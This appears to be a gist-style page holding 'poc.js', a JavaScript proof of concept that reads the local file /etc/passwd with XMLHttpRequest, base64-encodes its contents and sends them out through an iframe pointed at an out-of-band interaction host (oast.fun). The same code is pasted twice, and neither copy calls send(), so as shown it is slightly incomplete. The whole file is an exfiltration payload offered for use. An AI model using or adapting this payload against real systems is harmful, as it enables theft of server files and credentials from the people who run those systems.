Endrit Kastrati EndritKastrati

## poc.js
function reqListener () {
  var encoded = encodeURI(this.responseText);
  var b64 = btoa(this.responseText);
  var raw = this.responseText;
  document.write('<iframe src="https://hxhzpwxiqkyxeiozrdtb33nit8r72ai1x.oast.fun/exfil?data='+b64+'"></iframe>');
}

var oReq = new XMLHttpRequest();
oReq.addEventListener("load", reqListener);
oReq.open("GET", "file:///etc/passwd");
	function reqListener () {
	var encoded = encodeURI(this.responseText);
	var b64 = btoa(this.responseText);
	var raw = this.responseText;
	document.write('<iframe src="https://hxhzpwxiqkyxeiozrdtb33nit8r72ai1x.oast.fun/exfil?data='+b64+'"></iframe>');
	}

	var oReq = new XMLHttpRequest();
	oReq.addEventListener("load", reqListener);
	oReq.open("GET", "file:///etc/passwd");